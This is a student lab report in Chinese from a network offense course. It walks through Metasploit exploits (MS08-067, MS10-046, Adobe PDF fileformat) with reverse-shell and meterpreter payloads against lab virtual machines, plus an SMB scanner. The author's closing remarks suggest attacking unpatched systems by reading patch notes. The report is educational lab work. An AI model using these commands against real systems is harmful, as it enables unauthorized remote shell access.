2017-2018-2 20155230《网络对抗技术》实验5:MSF基础应用

基础问题回答
  • 用自己的话解释什么是exploit,payload,encode.
    • exploit 就是运行该模块吧,在msf的模块中配置好各项属性后exploit一下就开始运行使用该模块了
    • payload 是攻击载荷的统称,我们需要配置攻击载荷来选择获取靶机shell的方式
    • encode 编码,是一种免杀的方式

实践过程记录

1、一个主动攻击实践

  • 打开终端输入msfconsole,在msf命令行中输入search MS08-067搜索漏洞模块
    1071497-20180430210253426-1119201355.png

  • 输入use exploit/windows/smb/ms08_067_netapi使用该模块,这是一个针对Windows平台下smb服务ms08_067漏洞的渗透攻击

  • 输入set payload generic/shell_reverse_tcp选择该攻击载荷,通过反弹连接获得shell权限

  • 输入show payloads,查看需要配置的属性
    1071497-20180430211717979-498894944.png

  • 输入set RHOST 192.168.241.138、set LHOST 192.168.241.134、set LPORT 5230配置属性
    1071497-20180430212220991-543160384.png

  • 然后exploit进行监听
    1071497-20180430212236597-2030087823.png
    1071497-20180430212414357-625943421.png

2、一个针对浏览器的攻击

  • 输入search ms10_046查找漏洞
    1071497-20180430213106583-55371335.png

  • 由于是要对浏览器进行攻击,输入use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

  • 输入set payload generic/shell_reverse_tcp选择该攻击载荷

  • 输入show options,查看需要配置的属性
    1071497-20180430213710433-95177678.png

  • 输入set SRVHOST 192.168.241.134、set LHOST 192.168.241.134、set LPORT 5230配置属性,其中SRVHOST是后门服务器,设置的是攻击者的IP
    1071497-20180430221210132-1122746880.png

  • 输入exploit生成URL
    1071497-20180430221144510-1291619954.png

  • 在windows端访问该URL
    1071497-20180430221738607-636034949.png

  • 有个小插曲,windows端访问该url后,产生的后门被qq电脑管家直接查杀了。。。
    1071497-20180430222124114-1300820047.png

  • 输入sessions,可看到一个ID为2的连接
    1071497-20180430222352081-713882001.png

  • 输入session -i 2,接入ID为2的连接,获取shell权限成功。
    1071497-20180430222458416-1939638077.png

3、一个针对客户端的攻击

  • 输入search adobe查询漏洞,我选择的是exploit/windows/fileformat/adobe_collectemailinfo

  • 输入set payload windows/meterpreter/reverse_tcp选择该攻击载荷
    1071497-20180430224245127-1896835245.png

  • 输入set LHOST 192.168.241.134、set LPORT 5230配置属性
    1071497-20180430224356956-1651059275.png

  • 输入exploit,可以看到生成了msf.pdf
    1071497-20180430225128067-1978725003.png

  • 将它发送到windows xp靶机

  • 输入相关命令开始监听
    1071497-20180430225611478-284542249.png

  • 这里开启监听之后,在靶机运行pdf一直不能回连不知道是什么原因,猜测是回连的ip和端口写错了所以重做了两遍后门pdf!还是不能回连

  • 因为得不到任何提示,重新选择漏洞windows/fileformat/adobe_cooltype_sing
    1071497-20180430232020584-775706408.png
    1071497-20180430232055870-710032231.png

  • 将靶机上的pdf文件关闭后,监听被结束
    1071497-20180430232348952-1199554401.png

4、成功应用任何一个辅助模块

  • 我选择的是 auxiliary/scanner/smb/smb1

  • 这个辅助模块是用于扫描目标ip是否支持smbv1协议
    1071497-20180501132825829-156520432.png

  • 因为只检测靶机192.168.241.139,所以THREAD就可以默认是1,不做修改

  • run一下(也可以是exploit)
    1071497-20180501132855283-1556713472.png


离实战还缺些什么技术或步骤?
  • 找不到现行主流操作系统、浏览器、客户端的漏洞

  • 针对客户端的漏洞攻击要如何才能让目标长时间运行该客户端,以有足够时间来进行相关操作


实践总结与体会
  • 限于无法攻击更多是因为找不到存在于各个软件或操作系统的漏洞,所以当相关软件有漏洞补丁需要更新时,一定要及时更新!就像老师在课堂上说的,找不到漏洞没关系,可以去官网上看最新的漏洞补丁补的是哪个漏洞,然后针对该漏洞进行攻击,十有八九会有所收获,毕竟绝大多数人都没有及时更新补丁的习惯。

  • 也是再一次感受到了msf的局限性,里面收录的漏洞虽然已经足够多,但大多是已经过时了的系统漏洞,要将它用于实战则需要我们自己向其内部添加一些最新的漏洞模块,这显然不太现实。

  • 这门课是真的越学越想搞一波大事啊

  • 感谢5233刘高乐同学的电脑!我的vm版本过低拷过来的靶机无法兼容,加上老师也有说过这次实验可以使用其他同学的电脑,就借用刘高乐同学的电脑完成了这次实验!

转载于:https://www.cnblogs.com/J1n233/p/8974629.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值